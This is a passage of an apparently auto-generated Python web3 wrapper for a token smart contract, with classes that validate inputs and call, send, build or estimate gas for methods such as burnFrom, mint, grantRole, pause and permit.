def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, amount: int):
"""Validate the inputs to the burnFrom method."""
self.validator.assert_valid(
method_name='burnFrom',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name='burnFrom',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (account, amount)
def call(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(account, amount).call(tx_params.as_dict())
def send_transaction(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).transact(tx_params.as_dict())
def build_transaction(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).estimateGas(tx_params.as_dict())
class ContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractURI method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DecimalsMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the decimals method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DecreaseAllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the decreaseAllowance method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, spender: str, subtracted_value: int):
"""Validate the inputs to the decreaseAllowance method."""
self.validator.assert_valid(
method_name='decreaseAllowance',
parameter_name='spender',
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name='decreaseAllowance',
parameter_name='subtractedValue',
argument_value=subtracted_value,
)
# safeguard against fractional inputs
subtracted_value = int(subtracted_value)
return (spender, subtracted_value)
def call(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
spender, subtracted_value).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, subtracted_value).transact(tx_params.as_dict())
def build_transaction(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, subtracted_value).buildTransaction(tx_params.as_dict())
def estimate_gas(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(spender, subtracted_value) = self.validate_and_normalize_inputs(
spender, subtracted_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, subtracted_value).estimateGas(tx_params.as_dict())
class GetRoleAdminMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleAdmin method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleAdmin method."""
self.validator.assert_valid(
method_name='getRoleAdmin',
parameter_name='role',
argument_value=role,
)
return (role)
def call(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMember method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str], index: int):
"""Validate the inputs to the getRoleMember method."""
self.validator.assert_valid(
method_name='getRoleMember',
parameter_name='role',
argument_value=role,
)
self.validator.assert_valid(
method_name='getRoleMember',
parameter_name='index',
argument_value=index,
)
# safeguard against fractional inputs
index = int(index)
return (role, index)
def call(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
role, index).call(tx_params.as_dict())
return str(returned)
def send_transaction(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).estimateGas(tx_params.as_dict())
class GetRoleMemberCountMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMemberCount method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleMemberCount method."""
self.validator.assert_valid(
method_name='getRoleMemberCount',
parameter_name='role',
argument_value=role,
)
return (role)
def call(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return int(returned)
def send_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GrantRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the grantRole method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
"""Validate the inputs to the grantRole method."""
self.validator.assert_valid(
method_name='grantRole',
parameter_name='role',
argument_value=role,
)
self.validator.assert_valid(
method_name='grantRole',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(tx_params.as_dict())
class HasRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the hasRole method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
"""Validate the inputs to the hasRole method."""
self.validator.assert_valid(
method_name='hasRole',
parameter_name='role',
argument_value=role,
)
self.validator.assert_valid(
method_name='hasRole',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
role, account).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(tx_params.as_dict())
class IncreaseAllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the increaseAllowance method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, spender: str, added_value: int):
"""Validate the inputs to the increaseAllowance method."""
self.validator.assert_valid(
method_name='increaseAllowance',
parameter_name='spender',
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name='increaseAllowance',
parameter_name='addedValue',
argument_value=added_value,
)
# safeguard against fractional inputs
added_value = int(added_value)
return (spender, added_value)
def call(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
spender, added_value).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).transact(tx_params.as_dict())
def build_transaction(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).buildTransaction(tx_params.as_dict())
def estimate_gas(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(spender, added_value) = self.validate_and_normalize_inputs(
spender, added_value)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, added_value).estimateGas(tx_params.as_dict())
class IsRestrictedTransferMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the isRestrictedTransfer method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class IsTrustedForwarderMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the isTrustedForwarder method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, forwarder: str):
"""Validate the inputs to the isTrustedForwarder method."""
self.validator.assert_valid(
method_name='isTrustedForwarder',
parameter_name='forwarder',
argument_value=forwarder,
)
forwarder = self.validate_and_checksum_address(forwarder)
return (forwarder)
def call(self, forwarder: str, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(forwarder).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, forwarder: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).transact(tx_params.as_dict())
def build_transaction(self, forwarder: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).buildTransaction(tx_params.as_dict())
def estimate_gas(self, forwarder: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).estimateGas(tx_params.as_dict())
class MintMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the mint method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, to: str, amount: int):
"""Validate the inputs to the mint method."""
self.validator.assert_valid(
method_name='mint',
parameter_name='to',
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name='mint',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (to, amount)
def call(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(to, amount).call(tx_params.as_dict())
def send_transaction(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).transact(tx_params.as_dict())
def build_transaction(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, to: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(to, amount) = self.validate_and_normalize_inputs(to, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, amount).estimateGas(tx_params.as_dict())
class NameMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the name method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class NoncesMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the nonces method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, owner: str):
"""Validate the inputs to the nonces method."""
self.validator.assert_valid(
method_name='nonces',
parameter_name='owner',
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
return (owner)
def call(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(owner).call(tx_params.as_dict())
return int(returned)
def send_transaction(self, owner: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).transact(tx_params.as_dict())
def build_transaction(self, owner: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).buildTransaction(tx_params.as_dict())
def estimate_gas(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(owner) = self.validate_and_normalize_inputs(owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner).estimateGas(tx_params.as_dict())
class PauseMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the pause method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method().call(tx_params.as_dict())
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PausedMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the paused method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PermitMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the permit method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str]):
"""Validate the inputs to the permit method."""
self.validator.assert_valid(
method_name='permit',
parameter_name='owner',
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
self.validator.assert_valid(
method_name='permit',
parameter_name='spender',
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name='permit',
parameter_name='value',
argument_value=value,
)
# safeguard against fractional inputs
value = int(value)
self.validator.assert_valid(
method_name='permit',
parameter_name='deadline',
argument_value=deadline,
)
# safeguard against fractional inputs
deadline = int(deadline)
self.validator.assert_valid(
method_name='permit',
parameter_name='v',
argument_value=v,
)
self.validator.assert_valid(
method_name='permit',
parameter_name='r',
argument_value=r,
)
self.validator.assert_valid(
method_name='permit',
parameter_name='s',
argument_value=s,
)
return (owner, spender, value, deadline, v, r, s)
def call(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(owner, spender, value, deadline, v, r, s) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(owner, spender, value,
deadline, v, r, s).call(tx_params.as_dict())
def send_transaction(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(owner, spender, value, deadline, v, r, s) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender, value, deadline, v, r, s).transact(tx_params.as_dict())
